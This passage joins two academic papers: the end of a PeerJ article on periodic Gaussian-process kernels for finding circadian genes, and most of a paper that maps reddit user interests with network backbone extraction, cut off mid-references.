x →x (dashed line) is 0.69. Let PCOSOPT and PGP be the sets of selected periodic genes respectively by Edwards et al. (2006) and the method presented here and let PCOSOPT and PGP denote their complements. The overlap between these sets is summarised in Table 1. Although the results cannot be compared to any ground truth, the methods seem coherent since 88% of the genes share the same label. Furthermore, the estimated value of the period λ is consistent for the genes labelled as periodic by the two methods, as seen in Fig. 5. One interesting comparison between the two methods is to examine the genes that are classified differently. The available data from Edwards et al. (2006) allows focusing on the worst classification mistakes made by one method according to the other. This is illustrated in Fig. 6 which shows the behaviour of the most periodically expressed genes in PGP according to COSOPT and, conversely, the genes in PCOSOPT with the highest periodicity ratio S. Although it is undeniable that the genes selected only by COSOPT (Fig. 6A) present some periodic component, they also show a strong non-periodic part, Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 12/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 Figure 6 Examples of genes with different labels. (A) corresponds to genes labelled as periodic by COSOPT but not by the Gaussian process approach, whereas in (B) they are labelled as periodic only by the latter. In (A, B), the four selected genes are those with the highest periodic part according to the method that labels them as periodic. The titles of the graphs correspond to the name of the genes (AGI convention). corresponding either to noise or trend. For these genes, the value of the periodicity ratio is: 0.74 (0.10), 0.74 (0.15), 0.63 (0.11), 0.67 (0.05) (means and standard deviations, clockwise from top left) which is close to the classification boundary. On the other hand, the genes selected only by the Gaussian process approach show a strong periodic signal (we have for all genes S=1.01 (0.01)) with sharp spikes. We note from Fig. 6B that there is always at least one observation associated with each spike, which ensures that the behaviour of the Gaussian process models cannot simply be interpreted as overfitting. The reason COSOPT is not able to identify these signals as periodic is that it is based on a single cosine function which makes it inadequate for fitting non sinusoidal periodic functions. This is typically the case for gene expressions with spikes as in Fig. 6B, but it can also be seen on the test functions of Fig. 1. This comparison shows very promising results, both for the capability of the proposed method to handle large datasets and for the quality of the results. Furthermore, we believe that the spike shape of the newly discovered genes may be of particular interest for understanding the mechanism of the circadian clock. The full results, as well as the original dataset, can be found in the Supplemental Information. CONCLUSION The main purpose of this article is to introduce a new approach for estimating, extracting and quantifying the periodic component of a pseudo-periodic function f given some noisy observations yi = f (xi)+ε. The proposed method is typical in that it corresponds to the orthogonal projection onto a basis of periodic functions. The originality here is to perform this projection in some RKHS where the partial knowledge given by the observations can Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 13/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50/supplemental-information http://dx.doi.org/10.7717/peerj-cs.50 be dealt with elegantly. Previous theoretical results from the mid-1900s allowed us to derive the expressions of the inner product of RKHS based on Matérn kernels. Given these results, it was then possible to define a periodic kernel kp and to decompose k as a sum of sub-kernels k=kp+ka. We illustrated three fundamental features of the proposed kernels for Gaussian process modelling. First, as we have seen on the benchmark examples, they allowed us to approximate periodic non-sinusoidal patterns while retaining appropriate filtering of the noise. Second, they provided a natural decomposition of the Gaussian process model as a sum of periodic and aperiodic sub-models. Third, they can be reparametrised to define a wider family of kernel which is of particular interest for decoupling the assumptions on the behaviour of the periodic and aperiodic part of the signal. The probabilistic interpretation of the decomposition in sub-models is of great importance when it comes to define a criterion that quantifies the periodicity of f while taking into account the uncertainty about it. This goal was achieved by applying methods commonly used in Gaussian process based sensitivity analysis to define a periodicity ratio. Although the proposed method can be applied to any time series data, this work has originally been motivated by the detection of periodically expressed genes. In practice, listing such genes is a key step for a better understanding of the circadian clock mechanism at the gene level. The effectiveness of the method is illustrated on such data in the last section. The results we obtained are consistent with the literature but they also feature some new genes with a strong periodic component. This suggests that the approach described here is not only theoretically elegant but also efficient in practice. As a final remark, we would like to stress that the proposed method is fully compatible with all the features of Gaussian processes, from the combination of one-dimensional periodic kernels to obtain periodic kernels in higher dimension to the use of sparse methods when the number of observation becomes large. By implementing our new method within the GPy package for Gaussian process inference we have access to these generalisations along with effective methods for parameter estimation. An interesting future direction would be to incorporate the proposed kernel into the ‘Automated Statistician’ project (Lloyd et al., 2014; Duvenaud et al., 2013), which searches over grammars of kernels. APPENDIX A. DETAILS ON TEST FUNCTIONS The test functions shown in Fig. 1 are 1-periodic. Their expressions for x ∈[0,1) are (from top left, in a clockwise order): f1(x)=cos(2πx) f2(x)=1/2cos(2πx)+1/2cos(4πx) f3(x)= { 1 if x ∈[0,0.2] −1 if x ∈(0.2,1) f4(x)=4|x−0.5|+1 f5(x)=1−2x f6(x)=0. (22) Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 14/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 APPENDIX B. NORMS IN MATÉRN RKHS Autoregressive processes and RKHS norms A process is said to be autoregressive (AR) if the spectral density of the kernel S(ω)= 1 2π ∫ R k(t)e−iωt dt (23) can be written as a function of the form S(ω)= 1∣∣∑m k=0αk(iω) k ∣∣2 (24) where the polynomial ∑m k=0αkx k is real with no zeros in the right half of the complex plan Doob (1953). Hereafter we assume that m≥1 and that α0,αm 6=0. For such kernels, the inner product of the associated RKHS H is given by Hájek (1962), Kailath (1971) and Parzen (1961) 〈 h,g 〉 H= ∫ b a (Lt h)(Lt g)dt+2 ∑ 0≤j,k≤m−1 j+k even dj,kh (j)(a)g(k)(a) (25) where Lt h= m∑ k=0 αkh (k)(t) and dj,k = min(j,k)∑ i=max(0,j+k+1−n) (−1)(j−i)αiαj+k+1−i. We show in the next section that the Matérn kernels correspond to autoregressive kernels and, for the usual values of ν, we derive the norm of the associated RKHS. Application to Matérn kernels Following the pattern exposed in Doob (1953, p. 542), the spectral density of a Matérn kernel (Eq. (13)) can be written as the density of an AR process when ν+1/2 is an integer. Indeed, the roots of the polynomial 2ν `2 +ω2 are conjugate pairs so it can be expressed as the squared module of a complex number 2ν `2 +ω 2 = ( ω+ i √ 2ν ` )( ω− i √ 2ν ` ) = ∣∣∣∣ω+ i √ 2ν ` ∣∣∣∣2. (26) Multiplying by i and taking the conjugate of the quantity inside the module, we finally obtain a polynomial in iω with all roots in the left half of the complex plan: 2ν `2 +ω 2 = ∣∣∣∣iω+ √ 2ν ` ∣∣∣∣2⇒ ( 2ν `2 +ω 2 )(ν+1/2) = ∣∣∣∣∣∣ (√ 2ν ` +iω )(ν+1/2)∣∣∣∣∣∣ 2 . (27) Plugging this expression into Eq. (13), we obtain the desired expression of Sν: Sν(ω)= 1∣∣∣∣√ 0(ν)`2ν2σ2√π0(ν+1/2)(2ν)ν (√2ν` +iω)(ν+1/2) ∣∣∣∣2 . (28) Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 15/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 Using 0(ν)= (2ν−1)! √ π 22ν−1(ν−1/2)!, one can derive the following expression of the coefficients αk: αk = √ (2ν−1)!νν σ2(ν−1/2)!22ν Ckν+1/2 ( ` √ 2ν )k−1/2 . (29) Theses values of αk can be plugged into Eq. (25) to obtain the expression of the RKHS inner product. The results for ν∈{1/2,3/2,5/2} is given by Eqs. (15)–(17) in the main body of the article. ADDITIONAL INFORMATION AND DECLARATIONS Funding Support was provided by the BioPreDynProject (Knowledge Based Bio-Economy EU grant Ref 289434) and the BBSRC grant BB/1004769/1. James Hensman was funded by an MRC career development fellowship. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: BioPreDynProject: Ref 289434. BBSRC: BB/1004769/1. Competing Interests The authors declare there are no competing interests. Author Contributions • Nicolas Durrande and James Hensman conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Magnus Rattray and Neil D. Lawrence conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/SheffieldML. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.50#supplemental-information. REFERENCES Amaral I, Johnston I. 2012. Circadian expression of clock and putative clock- controlled genes in skeletal muscle of the zebrafish. American Journal of Physiology 302(1):R193–R206 DOI 10.1152/ajpregu.00367.2011. Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 16/18 https://peerj.com https://github.com/SheffieldML http://dx.doi.org/10.7717/peerj-cs.50#supplemental-information http://dx.doi.org/10.7717/peerj-cs.50#supplemental-information http://dx.doi.org/10.1152/ajpregu.00367.2011 http://dx.doi.org/10.7717/peerj-cs.50 Aronszajn N. 1950. Theory of reproducing kernels. Transactions of the American Mathematical Society 68(3):337–404 DOI 10.1090/S0002-9947-1950-0051437-7. Berlinet A, Thomas-Agnan C. 2004. Reproducing kernel Hilbert spaces in probability and statistics. Dordrecht: Kluwer Academic Publishers. Ding Z, Doyle MR, Amasino RM, Davis SJ. 2007. A complex genetic interaction between Arabidopsis thaliana TOC1 and CCA1/LHY in driving the circadian clock and in output regulation. Genetics 176(3):1501–1510 DOI 10.1534/genetics.107.072769. Doob JL. 1953. Stochastic processes. Vol. 101. New York: John Wiley & Sons. Durrande N, Ginsbourger D, Roustant O. 2012. Additive covariance kernels for high- dimensional Gaussian process modeling. Annales de la faculté des Sciences de Toulouse XXI:481–499. Duvenaud D, Lloyd J, Grosse R, Tenenbaum J, Zoubin G. 2013. Structure discovery in nonparametric regression through compositional kernel search. In: Proceedings of the 30th international conference on machine learning, 1166–1174. Edwards KD, Anderson PE, Hall A, Salathia NS, Locke JCW, Lynn JR, Straume M, Smith JQ, Millar AJ. 2006. FLOWERING LOCUS C mediates natural variation in the high-temperature response of the Arabidopsis circadian clock. The Plant Cell Online 18(3):639–650 DOI 10.1105/tpc.105.038315. Hájek J. 1962. On linear statistical problems in stochastic processes. Czechoslovak Mathematical Journal 12(87):404–444. Hartley HO. 1949. Tests of significance in harmonic analysis. Biometrika 36(1):194–201 DOI 10.1093/biomet/36.1-2.194. Hughes M, DiTacchio L, Hayes K, Vollmers C, Pulivarthy S, Baggs J, Panda S, Ho- genesch J. 2009. Harmonics of circadian gene transcription in mammals. PLoS Genetics 5(4):e1000442 DOI 10.1371/journal.pgen.1000442. Kailath T. 1971. RKHS approach to detection and estimation problems–I: deterministic signals in Gaussian noise. IEEE Transactions on Information Theory 17(5):530–549 DOI 10.1109/TIT.1971.1054673. Leahy DA, Darbro W, Elsner RF, Weisskopf MC, Kahn S, Sutherland PG, Grindlay JE. 1983. On searches for pulsed emission with application to four globular cluster X- ray sources-NGC 1851, 6441, 6624, and 6712. Astrophysical Journal 266:160–170 DOI 10.1086/160766. Lloyd JR, Duvenaud D, Grosse R, Tenenbaum J, Ghahramani Z. 2014. Automatic construction and natural-language description of nonparametric regression models. In: Twenty-eighth AAAI conference on artificial intelligence. Palo Alto: Association for the Advancement of Artificial Intelligence. Marrel A, Iooss B, Laurent B, Roustant O. 2009. Calculations of sobol indices for the gaussian process metamodel. Reliability Engineering & System Safety 94(3):742–751 DOI 10.1016/j.ress.2008.07.008. Matheron G. 1963. Principles of geostatistics. Economic Geology 58(8):1246–1266 DOI 10.2113/gsecongeo.58.8.1246. Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 17/18 https://peerj.com http://dx.doi.org/10.1090/S0002-9947-1950-0051437-7 http://dx.doi.org/10.1534/genetics.107.072769 http://dx.doi.org/10.1105/tpc.105.038315 http://dx.doi.org/10.1093/biomet/36.1-2.194 http://dx.doi.org/10.1093/biomet/36.1-2.194 http://dx.doi.org/10.1371/journal.pgen.1000442 http://dx.doi.org/10.1109/TIT.1971.1054673 http://dx.doi.org/10.1109/TIT.1971.1054673 http://dx.doi.org/10.1086/160766 http://dx.doi.org/10.1086/160766 http://dx.doi.org/10.1016/j.ress.2008.07.008 http://dx.doi.org/10.1016/j.ress.2008.07.008 http://dx.doi.org/10.2113/gsecongeo.58.8.1246 http://dx.doi.org/10.2113/gsecongeo.58.8.1246 http://dx.doi.org/10.7717/peerj-cs.50 Oakley JE, O’Hagan A. 2004. Probabilistic sensitivity analysis of complex models: a Bayesian approach. Journal of the Royal Statistical Society: Series B (Statistical Methodology) 66(3):751–769 DOI 10.1111/j.1467-9868.2004.05304.x. Parzen E. 1961. An approach to time series analysis. The Annals of Mathematical Statistics 32(4):951–989. Porcu E, Stein ML. 2012. On some local, global and regularity behaviour of some classes of covariance functions. Berlin Heidelberg: Springer, 221–238. Rasmussen CE, Williams C. 2006. Gaussian processes for machine learning. Cambridge: MIT Press. Scheuerer M, Schaback R, Schlather M. 2011. Interpolation of spatial data—a stochastic or a deterministic problem? Technical report. Universität Göttingen. Schuster A. 1898. On the investigation of hidden periodicities with application to a supposed 26 day period of meteorological phenomena. Terrestrial Magnetism 3(1):13–41 DOI 10.1029/TM003i001p00013. Stein ML. 1999. Interpolation of Spatial Data: some theory for kriging. Berlin Heidelberg: Springer Verlag. Stellingwerf RF. 1978. Period determination using phase dispersion minimization. Astrophysical Journal 224:953–960 DOI 10.1086/156444. Straume M. 2004. DNA microarray time series analysis: automated statistical assess- ment of circadian rhythms in gene expression patterning. Methods in Enzymology 383:149–166 DOI 10.1016/S0076-6879(04)83007-6. Thomson W. 1878. Harmonic analyzer. Proceedings of the Royal Society of London 27(185–189):371–373 DOI 10.1098/rspl.1878.0062. Troutman BM. 1979. Some results in periodic autoregression. Biometrika 66(2):219–228 DOI 10.1093/biomet/66.2.219. Vecchia AV. 1985. Maximum likelihood estimation for periodic autoregressive moving average models. Technometrics 27(4):375–384 DOI 10.1080/00401706.1985.10488076. Wahba G. 1990. Spline models for observational data. Vol. 59. Philadelphia: Society for Industrial Mathematics. Wendland H. 2005. Scattered data approximation. Vol. 17. Cambridge: Cambridge University Press. Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 18/18 https://peerj.com http://dx.doi.org/10.1111/j.1467-9868.2004.05304.x http://dx.doi.org/10.1029/TM003i001p00013 http://dx.doi.org/10.1086/156444 http://dx.doi.org/10.1016/S0076-6879(04)83007-6 http://dx.doi.org/10.1098/rspl.1878.0062 http://dx.doi.org/10.1093/biomet/66.2.219 http://dx.doi.org/10.1093/biomet/66.2.219 http://dx.doi.org/10.1080/00401706.1985.10488076 http://dx.doi.org/10.7717/peerj-cs.50 work_dhlxzkabinh5dbnupsc3ro2fke ---- 1 Navigating the massive world of reddit: Using backbone networks to map user interests in social media Randal S. Olson1,∗, Zachary P. Neal2 1 Department of Computer Science & Engineering 2 Department of Sociology Michigan State University, East Lansing, MI 48824, U.S.A. ∗ E-mail: olsonran@msu.edu Abstract In the massive online worlds of social media, users frequently rely on organizing themselves around specific topics of interest to find and engage with like-minded people. However, navigating these massive worlds and finding topics of specific interest often proves difficult because the worlds are mostly organized haphazardly, leaving users to find relevant interests by word of mouth or using a basic search feature. Here, we report on a method using the backbone of a network to create a map of the primary topics of interest in any social network. To demonstrate the method, we build an interest map for the social news web site reddit and show how such a map could be used to navigate a social media world. Moreover, we analyze the network properties of the reddit social network and find that it has a scale-free, small-world, and modular community structure, much like other online social networks such as Facebook and Twitter. We suggest that the integration of interest maps into popular social media platforms will assist users in organizing themselves into more specific interest groups, which will help alleviate the overcrowding effect often observed in large online communities. Introduction In the past decade, social media platforms have grown from a pastime for teenagers into tools that pervade nearly all modern adults’ lives [1]. Social media users typically organize themselves around specific interests, such as a sports team or hobby, which facilitates interactions with other users who share similar interests. For example, Facebook users subscribe to topic-specific “pages” [2], Twitter users classify their tweets using topic-specific “hashtags” [3], and reddit users post and subscribe to topic-specific sub-forums called “subreddits” [4]. These interest-based devices provide structure to the growing worlds of social media, and are essential for the long-term success of social media platforms because they make these big worlds feel small and navigable. However, navigation of social media is challenging because these worlds do not come with maps [5, 6]. Users are often left to discover pages, hashtags, or subreddits of interest haphazardly, by word of mouth, following other users’ “votes” or “likes”, or by using a basic search feature. Owing to the scale-free structure of most online social networks, these elementary navigation strategies result in users being funnelled into a few large and broad interest groups, while failing to discover more specific groups that may be of greater interest [7, 8]. In this work, we combine techniques for network backbone extraction and community detection to construct a roadmap that can assist social media users in navigating these interest groups by identifying related interest groups and suggesting them to users. We implement this method for the social news web site reddit [9], one of the most visited social media platforms on the web [10], and produce an interactive map of all of the subreddits. An interactive version of the reddit interest map is available online [11]. By viewing subreddits as nodes linked by users with common interests, we find that the reddit social media world has a scale-free, small-world, and modular community structure. The scale-free property is the expected outcome of a preferential attachment process and helps explain the challenges of haphazard navigation. Additionally, the small-world property explains how the big world of reddit can seem small 2 and navigable to users when it is mapped out. Finally, the modular community structure in which narrow interest-based subreddits (e.g., dubstep or rock music) are organized into broader communities (e.g., music) allows users to easily identify related interests by zooming in on a broader community. We suggest that the integration of such interest maps into popular social media platforms will assist users in organizing themselves into more specific interest groups, which will help alleviate the overcrowding effect often observed in large online communities [4]. Further, this work releases and provides an overview of a data set of over 850,000 anonymized reddit user’s interests, thus establishing another standard real-world social network data set for researchers to study. This is useful because, although reddit is among the largest online social networks and has been identified as a starting point for the viral spread of memes and other online information [12], it has been relatively understudied [4, 13, 14]. This data set can be downloaded online at [15]. Video Games My Little Pony LGBT Pornography Programming Guns Electronic Music Fitness Sports Soccer Figure 1. Reddit interest network. The largest components of the reddit interest network is shown with 10 interest meta-communities annotated; it closely matches the structure of other online social networks including Flikr and Yahoo360 [16]. Each node is a single subreddit, where color indicates the interest meta-community that the subreddit is a member of. Nodes are sized by their weighted PageRank to provide an indication of how likely a node is to be visited, and positioned according to the OpenOrd layout in Gephi to place related nodes together. An interactive version of the reddit interest map is available online at http://rhiever.github.io/redditviz/clustered/ http://rhiever.github.io/redditviz/clustered/ 3 Results Reddit interest map For the final version of the reddit interest map, we use the backbone network produced with α = 0.05 (see Methods). This results in a network with 59 distinct clusters, which we call interest meta-communities. In Figure 1, the nodes (i.e., subreddits) are sized by their weighted PageRank [17] to provide an indication of how likely a node is to be visited, and positioned according to the OpenOrd layout in Gephi [18] to place related nodes together. Through this method, we immediately see several distinct interest meta-communities, 10 of which are annotated in Figure 1. These interest meta-communities act as starting points in the interest map to show the broad interest categories that the entire reddit community is discussing. From these starting points, users can zoom in on a single broad interest category to find subreddits dedicated to more specific interests, as shown in Figure 2. Notably, there is a large, orange interest meta-community in the center of the interest map that overlaps with several other interest meta-communities. This orange interest meta-community represents the most popular, general interest subreddits (e.g., “pictures” and “videos”) in which users of all backgrounds regularly participate, and thus are expected to have considerable overlap with many other communities. Figure 2 depicts zoomed-in views of two interest meta-communities annotated in Figure 1. In Fig- ure 2A, the “sports” meta-community, specific sports teams are organized around the corresponding sport that the teams play in. For example, subreddits dedicated to discussion of the Washington Redskins or Denver Broncos – relatively small, specific subreddits – are organized around the larger, more general interest NFL subreddit where users discuss the latest NFL news and games. Similarly in Figure 2B, the “programming” meta-community, subreddits dedicated to discussing programming languages such as Python and Java are organized around a more general programming subreddit, where users discuss more general programming topics. This backbone network structure naturally lends itself to an intuitive interest recommendation system. Instead of requiring a user to provide prior information about their interests, the interest map provides a hierarchical view of all user interests in the social network. Further, instead of only suggesting interests immediately related to the user’s current interest(s), the interest map recommends interests that are potentially two or more links away. For example in Figure 2A, although the Miami Heat and Miami Dolphins subreddits are not linked, Miami Heat fans may also be fans of the Miami Dolphins. A traditional recommendation system would only recommend NBA to a Miami Heat fan, whereas the interest map also recommends the Miami Dolphins subreddit because they are members of the same interest meta- community. Network properties In Figure 3, we show a series of network statistics to provide an overview of the backbone reddit interest network. These network statistics are plotted over a range of α cutoff values for the backbone reddit interest network (see Methods) to demonstrate that the interest network we chose in Figure 1 is robust to relevant α cutoff values. As expected, the majority of the edges are pruned by an α cutoff of 0.05 (Figure 3, top left). This result demonstrates that the backbone interest network is stable with an α cutoff ≤ 0.05, which is the most relevant range of α cutoffs to explore. Surprisingly, 80% of the subreddits that we investigated – roughly 12,000 subreddits – do not have enough users that consistently post in another subreddit to maintain even a single edge with another subreddit. The majority of these 12,000 subreddits likely do not have any significant edges due to user inactivity, e.g., some subreddits have only a single user that frequently posts to them (Table 1). Another factor that likely contributes to the 12,000 unlinked subreddits is temporary interests, i.e., an interest such as the U.S. Presidential election that temporarily 4 A) B) Figure 2. Example reddit interest meta-communities. Pictured are several topic-specific subreddits composing a meta-community around a broad topic such as sports (A) or programming (B). Each node is a subreddit, and each edge indicates that a significant portion of the posters in the two subreddits post in both subreddits (see Methods). 5 10 -4 10 -3 10 -2 10 -1 10 0 0.0 0.2 0.4 0.6 0.8 1.0 F ra c ti o n o f to ta l Number of nodes Number of edges 10 -4 10 -3 10 -2 10 -1 10 0 0.5 1.0 1.5 2.0 E x p o n e n t fo r p o w e r la w f it 10 -4 10 -3 10 -2 10 -1 10 0 0.0 0.2 0.4 0.6 0.8 1.0 A v g c lu st e ri n g c o e ff ic ie n t Reddit network Random network 10 -4 10 -3 10 -2 10 -1 10 0 1.5 2.0 2.5 3.0 3.5 4.0 A v g s h o rt e st p a th l e n g th 10 -4 10 -3 10 -2 10 -1 10 0 α 20 30 40 50 60 70 80 90 # o f c o m m u n it ie s 10 -4 10 -3 10 -2 10 -1 10 0 α 0.20 0.25 0.30 0.35 0.40 0.45 M o d u la ri ty Figure 3. Network statistics for the backbone network. Sensitivity analysis of the reddit interest network over a range of α cutoff values. Lower α means that fewer statistically significant edges are pruned. In general, this sensitivity analysis shows that the backbone interest network is stable for α cutoff values ≤ 0.05. Error bars for the Erdős-Rényi random networks are two standard deviations over 30 random networks, and are too small to show up on the graph. Note the logarithmic scale of the x-axis. 6 draws a large number of people together, but eventually fades into obscurity again. Next, we are interested in exploring whether the backbone reddit interest network is a scale-free network, where preferential attachment to subreddits results in a few extremely popular (i.e., connected) subreddits and mostly unpopular subreddits. As such, scale-free networks are known to have node degree distributions that fit a power law [7, 8]. Regardless of the α cutoff, we observed that the node degree distribution of all backbone reddit interest networks fit a power law (R2 ≈ 0.91 for k ≥ 50; Figure 3, top right). This scale-free network structure is likely partially due to reddit’s default subreddit system [19], where newly registered users are subscribed to a set of 20 subreddits by default. Furthermore, we want to confirm that the backbone reddit interest network is a small-world net- work [20]. Small-world networks are known to contain numerous clusters, as indicated by a high average clustering coefficient, with sparse edges between those clusters, which results in an average shortest path length between all nodes (Lsw) that scales logarithmically with the number of nodes (N): Lsw ≈ log10(N) (1) Figure 3 (middle left and middle right) depicts the average clustering coefficient and shortest path length for all nodes in the backbone reddit interest network. Compared to Erdős-Rényi random networks with the same number of nodes and edges, the backbone network has a significantly higher average clustering coefficient. Similarly, the measured average shortest path length of the backbone network (α cutoff = 0.05) follows Equation 1, with Lsw = log10(2, 347) = 3.37 ≈ 3.71 from Figure 3 (middle right). Thus, the backbone reddit interest backbone network qualitatively appears to exhibit small-world network properties. To quantitatively determine whether the reddit interest network exhibits small-world network prop- erties, we used the small-worldness score (SG) proposed in [21]: SG = CG/Crand LG/Lrand (2) where C is the average clustering coefficient, L is the average shortest path length between all nodes, G is the network the small-worldness score is being computed for, and “rand” is an Erdős-Rényi random network with the same number of nodes and edges as G. If SG > 1, then the network is classified as a small-world network. For the backbone reddit network, we calculated SG = 14.2 (P < 0.001), which indicates that the reddit interest network exhibits small-world network properties. Now that we know that the backbone reddit interest network is scale-free and exhibits small-world network properties, we want to study the community structure of the backbone network. Shown in Figure 3 (bottom right), the backbone network exhibits a consistently high modularity score with an α cutoff as high as 0.9, implying that even a slight reduction in the number of edges in the backbone network reveals the reddit interest community structure. Correspondingly, depicted in Figure 3 (bottom left), the number of identified communities (i.e., clusters) remains relatively low until the α cutoff is reduced to ≤ 0.9. As the α cutoff is reduced, the number of identified communities generally decreases, which coincides with the loss of nodes as α decreases. Thus, the backbone reddit interest network has ≈ 30 core communities, and another ≈ 30 weakly linked communities that are lost as a more stringent α cutoff is applied. Discussion We have shown that backbone networks can be used to map and navigate massive interest networks in social media. By viewing the big world of reddit as a hierarchical map, users can now explore related interests without providing any prior information about their own interests. Future applications of this method may also facilitate navigation of other popular social network platforms such as Facebook and Twitter. 7 Furthermore, such an interest map could allow social media users to self-organize into more specific interest forums, thus reducing preferential attachment to large, general interest forums and alleviating the issues that arise in overcrowded social network forums [4]. Given previous work that suggests net- work properties such as small-worldness and even modularity can result solely from network growth processes [22], it would be interesting in future work to observe what processes govern network growth when users have access to an interests map like those shown in Figures 1 and 2, and what network properties emerge from these growth processes. This work provides a unique view of reddit that debunks a common misconception of the social news web site. Typically, outsiders view reddit as a single, homogeneous entity that acts as one, e.g. “Should Reddit Be Blamed for the Spreading of a Smear?” [23]. In contrast, the reddit interest map shown here provides a different view of reddit, where many users organize themselves into cliques based on shared interests and rarely interact with other reddit users outside their clique. In that light, we hope this work reveals that, like many social communities (online or offline), reddit is a community composed of a diverse group of people that are brought together by thousands of seemingly-unrelated interests. Additionally, we explored the network properties of the backbone reddit interest network that we composed from the posting behavior of over 850,000 active reddit users. In this analysis, we found that the reddit interest network has a scale-free, small-world, and modular community structure, corroborating findings in many other online social networks [24, 25]. Uniquely, reddit potentially enforces a scale- free network structure on its users by automatically subscribing all new users to the same set of 20 subreddits [19]. Exploring the effect of automatically subscribing users to a fixed set of interest-specific forums on social interest network structure could be another interesting venue of future work. To expedite future analyses of the reddit interest network, we have provided the raw, anonymized data set available to download online [15]. It is important to note that the sample of user behavior we have taken is cross-sectional, reflecting users’ reddit posts and thus the relationships among reddit interests at a fixed point in time in mid- 2013. However, as users’ interests evolve, so too do the relationships among them [26]. In some cases, highly specialized and related subreddits may fuse into a single subreddit, while in other cases a general subreddit may split into multiple more specialized ones. Thus, such an interest map would require periodic (or, ideally, real-time) updating to accurately reflect dominant interests in the social network and their relationships to one another. Methods To acquire the data for this study, we mined user posting behavior data from reddit by first gathering the user names of 876,961 active users that post to 15,122 distinct subreddits (see Table S1 for more detail). We note that reddit reports to have over 2.6 million registered users as of December 2013 [27], so this data set represents a random sample of roughly 1/3 of the total active users on reddit. For each of the users, we gathered their 1,000 most recent link submissions and comments, counted how many times they post to each subreddit, and registered them as interested in a subreddit only if they posted there at least 10 times. We applied this threshold of at least 10 posts to filter out users that are not active in a particular subreddit. From these data, we defined a bipartite network X, where Xij = 1 if user i is an active poster in subreddit j and otherwise is 0. We then projected this as a weighted unipartite network Y as XX′, where Yij is the number of users that post in both subreddits i and j. This resulted in 4,520,054 non-zero edges between the subreddits. Details of the raw weighted subreddit network are shown in Table 1. Due to the challenges associated with analyzing large weighted networks, we reduced the number of edges in the weighted subreddit network using a backbone extraction algorithm [28]. This backbone extraction algorithm preserves edges whose weight is statistically incompatible, at a given level of signif- icance α, with a null model in which edge weights are distributed uniformly at random. In the resulting 8 Table 1. Edge weights in the raw and backbone reddit interest networks Network Mean Minimum Maximum Raw 17.77 1 309,985 Backbone 0.0052 0.00068 0.1997 backbone network, two subreddits are linked if the number of users who post in both of them is statis- tically significantly larger than expected in a null model, from the perspective of both subreddits. To combine the directed edges between each two nodes, we replaced the two directed edges with a single undirected edge whose weight is the average of the two directed edges. Thus, this technique defines a network of subreddit pathways along which there is a high probability users might traverse if they navigate reddit by following the posts of other users. Adjusting the α parameter allows the backbone network to include more (e.g., when α if larger) or fewer (e.g., when α is smaller) such pathways. Figure 3 summarizes the topological properties of backbones extracted using a range of α parameter values; in the findings and discussion we focus on a backbone extracted using the conventional α = 0.05. We used Python’s PRAW package1 to gather the data and Python’s NetworkX package [29] to compute all network statistics. In the backbone graph, we focus only on the largest connected component. We detected network communities using [30] and visualized the communities using the OpenOrd node layout, both as implemented in Gephi [18]. Acknowledgments We gratefully acknowledge the support of the Michigan State University High Performance Computing Center and the Institute for Cyber Enabled Research (iCER). We thank Arend Hintze, Christoph Adami, and Emily Weigel for helpful feedback during the preparation of this manuscript. References 1. Rainie L, Wellman B (2012) Networked: The new social operating system. The MIT Press. 2. Strand JL (2011) Facebook: Trademarks, fan pages, and community pages. Intellectual Property & Technology Law Journal 23: 10–13. 3. Chang HC (2010) A new perspective on twitter hashtag use: diffusion of innovation theory. Pro- ceedings of the American Society for Information Science and Technology 47: 1–4. 4. Gilbert E (2013) Widespread underprovision on reddit. In: Proceedings of the 2013 conference on Computer supported cooperative work. New York, NY, USA: ACM, CSCW ’13, pp. 803–808. doi:10.1145/2441776.2441866. 5. Boguna M, Krioukov D, Claffy KC (2008) Navigability of complex networks. Nature Physics 5: 74–80. 6. Benevenuto F, Rodrigues T, Cha M, Almeida V (2012) Characterizing user navigation and inter- actions in online social networks. Information Sciences 195: 1–24. 7. Albert R, Jeong H, Barabási AL (1999) Internet: Diameter of the world-wide web. Nature 401: 130–131. 1Python Reddit API Wrapper (PRAW): https://github.com/praw-dev/praw https://github.com/praw-dev/praw 9 8. Barabási AL, Albert R, Jeong H (2000) Scale-free characteristics of random networks: the topology of the world-wide web. Physica A: Statistical Mechanics and its Applications 281: 69–77. 9. reddit (2013). What is reddit? URL http://www.reddit.com/wiki/faq#wiki_what_is_reddit. 3F. 10. Alexa (2013). reddit alexa ranking. URL http://www.alexa.com/siteinfo/reddit.com. 11. Olson RS (2013). redditviz, the interactive reddit interest map. URL http://rhiever.github. io/redditviz/clustered/. 12. Sanderson B, Rigby M (2013) We’ve reddit, have you? What librarians can learn from a site full of memes. College & Research Libraries News 74: 518–521. 13. Wasike BS (2011) Framing social news sites: An analysis of the top ranked stories on reddit and Digg. Southwestern Mass Communication Journal 27. 14. Merritt E (2012) An Analysis of the Discourse of Internet Trolling: A Case Study of Reddit.com. Ph.D. thesis. 15. Olson RS (2013). reddit user posting behavior (mid-2013). URL http://dx.doi.org/10.6084/ m9.figshare.874101. 16. Kumar R, Novak J, Tomkins A (2010) Structure and evolution of online social networks. In: Link Mining: Models, Algorithms, and Applications, Springer. pp. 337–357. 17. Page L, Brin S, Motwani R, Winograd T (1999) The pagerank citation ranking: Bringing order to the web. Technical Report 